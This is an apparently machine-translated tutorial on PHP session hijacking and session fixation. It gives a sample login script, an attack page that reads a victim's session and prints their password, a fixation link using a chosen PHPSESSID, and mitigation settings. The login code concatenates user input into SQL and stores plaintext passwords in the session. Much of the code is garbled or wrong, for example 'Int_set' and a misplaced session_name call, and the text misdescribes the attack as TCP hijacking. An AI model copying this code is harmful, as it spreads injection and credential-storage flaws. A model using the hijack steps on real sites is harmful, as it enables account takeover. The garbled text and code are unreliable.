This article mainly introduces the session hijacking for PHP website. Session hijacking is a more complex attack method. Most computers on the internet are at risk of being attacked. This is a method of hijacking the TCP protocol, so almost all local area networks, there is the possibility of hijacking.
Communication is communicated between the server and the client through a session. When the client's browser is connected to the server, the server establishes a session for that user. Each user's session is independent and maintained by the server. Each user's session is identified by a unique string that becomes the session ID. When a user makes a request, the HTTP header that is sent contains the value of the session ID. The server uses the session ID in the HTTP header to identify which user submitted the request.
The session saves each user's personal data, and the general Web application uses the session to save the authenticated user account and password. When converting different Web pages, if you need to authenticate users, you can compare them with the accounts and passwords stored in the session. The session's life cycle begins when the user connects to the server, and ends when the user Session_destroy the session data when the users close the browser or log off. If the user does not use the computer for 20 minutes, the session will end automatically.
Application Architecture for PHP processing session
Session Hijacking
Session hijacking refers to the attacker using various means to obtain the target user's session ID. Once the session ID is obtained, the attacker can use the identity of the target user to log on to the Web site and get the permissions of the target user.
How the attacker obtains the target user session ID:
1) Brute force: Try various session IDs until they are cracked.
2) Calculation: If the session ID is generated in a non-random way, then it is possible to calculate
3) Stealing: Using network interception, XSS attacks and other methods to obtain
Attack steps for session hijacking
Instance
- login.php
- Session_Start ();
- if (Isset ($_post["Login"]))
- {
- $link = mysql_connect ("localhost", "root", "root")
- Or Die ("could not establish MySQL database connection:". Mysql_error ());
- mysql_select_db ("CMS") or Die ("Unable to select MySQL database");
- if (!GET_MAGIC_QUOTES_GPC ())
- {
- $query = "SELECT * from member where Username= '". addslashes ($_post["username"]).
- "' and password= '". addslashes ($_post["password"]). "'";
- }
- Else
- {
- $query = "SELECT * from member where Username= '". $_post["username"].
- "' and password= '". $_post["password"]. "'";
- }
- $result = mysql_query ($query)
- Or Die ("execute MySQL query statement failed:". Mysql_error ());
- $match _count = mysql_num_rows ($result);
- if ($match _count)
- {
- $_session["username"] = $_post["username"];
- $_session["password"] = $_post["password"];
- $_session["book"] = 1;
- Mysql_free_result ($result);
- Mysql_close ($link);
- Header ("location:http://localhost/index.php?user=".
- $_post["username"]);
- }
.....
- index.php
- Open session
- Session_Start ();
- The visitor's Session ID is: Echo session_id ();?>
- Visitors: Echo htmlspecialchars ($_get["user"], ent_quotes);?>
- Number of book Items: Echo htmlspecialchars ($_session["book"], ent_quotes);?>
- If the login is successful, use the
- $_session["username"] Save account
- $_session["password"] Save password
- #_SESSION ["book"] Save the number of items purchased
Display after Login
Start attacking
- //ATTACK.PHP 
- php
- // open session
- session_start ();
- echo " the target user's session id is: " . session_id () . " <br /> "&NBSP;
- echo " The username of the target user is: " . $_session["username"] . "<br /> "&NBSP;
- echo "target user's password is:" . $_session["password"] . " <br /> "&NBSP;
- // Set the number of book to 2000 ,
- $_session["book"]&NBSP;=&NBSP;2000;&NBSP;
-
Submit Http://localhost/attack.php?PHPSESSID=5a6kqe7cufhstuhcmhgr9nsg45 This ID is the client session ID to get to, refresh the customer page later
The product that the customer buys becomes 2000
Session fixed attack
Hackers can use the way the session ID is sent to the user to complete the attack
http://localhost/index.php?user=dodo&PHPSESSID=1234 send this link to dodo this user shows
After the attacker then accesses http://localhost/attack.php?PHPSESSID=1234, the customer page refreshes and discovers
The number of goods has become 2000
Precautionary approach
1) Change session ID periodically
function bool session_regenerate_id ([bool delete_old_session])
Delete_old_session is true, the old session file is deleted; False, the old session is preserved, the default is false, optional
At the beginning of index.php, add
Session_Start ();
SESSION_REGENERATE_ID (TRUE);
......
This will result in a new session ID every time you reload
2) Change the name of the session
The default name of the session is PHPSESSID, which will be stored in the cookie, if the hacker does not grab packet analysis, it can not guess the name, blocking the partial attack
Session_Start ();
Session_name ("Mysessionid");
......
3) Close the transparent session ID
Transparent session ID refers to the Sessioin ID used to pass a link when the HTTP request in the browser does not use cookies to create the session ID; open PHP.ini, edit
Session.use_trans_sid = 0
In your code
Int_set ("Session.use_trans_sid", 0);
Session_Start ();
......
4) Only check session ID from cookie
Session.use_cookies = 1 means using cookies to store session ID
Session.use_only_cookies = 1 means that only cookies are used to store session IDs, which avoids fixed session attacks
In your code
Int_set ("Session.use_cookies", 1);
Int_set ("Session.use_only_cookies", 1); P>
5) using URL to pass hidden parameters
Session_Start ();
$seid = MD5 (Uniqid (rand ()), TRUE));
$_session["Seid"] = $seid;
Although the attacker can get the session data, but cannot know the value of the $seid, as long as the value of Seid check, you can confirm whether the current page is called by the Web program itself.